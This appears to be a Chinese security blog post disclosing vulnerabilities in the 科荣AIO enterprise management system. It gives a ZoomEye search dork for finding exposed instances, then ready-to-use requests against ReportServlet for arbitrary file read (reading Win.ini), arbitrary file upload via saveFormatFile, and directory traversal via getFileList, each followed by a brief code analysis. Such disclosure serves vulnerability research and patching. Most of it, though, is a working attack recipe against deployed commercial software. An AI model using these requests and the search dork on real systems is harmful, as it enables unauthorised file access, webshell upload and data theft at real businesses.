大家可以把安全绘景设为星标，这样就可以及时看到我们最新发布内容啦！

前言

科荣AIO 企业⼀体化管理解决⽅案 通过ERPERP（进销存财务）、OAOA（办公⾃动化）、CRMCRM（客⼾关系管理）、UDPUDP（⾃定义平台），集电⼦商务平台、⽀付平台、ERP 平台、微信平台、移动APP 等解决了众多企业客⼾在管理过程中跨部⻔、多功能、需求多变等通⽤及个性化的问题。

搜索引擎

ZoomEye: "changeAccount('8000')"

漏洞复现

新版本

任意文件读取

http://xxxxx/ReportServlet?operation=getPicFile&fileName=/DISKC/Windows/Win.ini

代码分析

当operation的值为getPicFile，将传入的fileName参数值进行判断是否以"/DISK"开头并且不为空，如果不为空并以"/DISK"开头进行截取如：/DISKC/Windows/Win.ini ==>DISKC/Windows/Win.ini，接着判断是否"DISK"开头,如果不为空并以"DISK"开头又进行截取然后拼接: 如DISKC/Windows/Win.ini==>C:/Windows/Win.ini最后进行文件读取下载。

老版本

任意文件上传

POST /ReportServlet?operation=saveFormatFile&fileName=demo.css&language= HTTP/1.1Host: xxxxxxConnection: loseContent-Type: application/x-www-form-urlencodedContent-Length: 2
demo

代码分析

代码很直接获取POST输入流将内容写到指定fileName中，由于fileName未进行过滤导致可以进行越级上传。

目录遍历

http://xxxxxx/ReportServlet?operation=getFileList&path=../../../

代码分析

直接将path带入进行拼接然后遍历输出。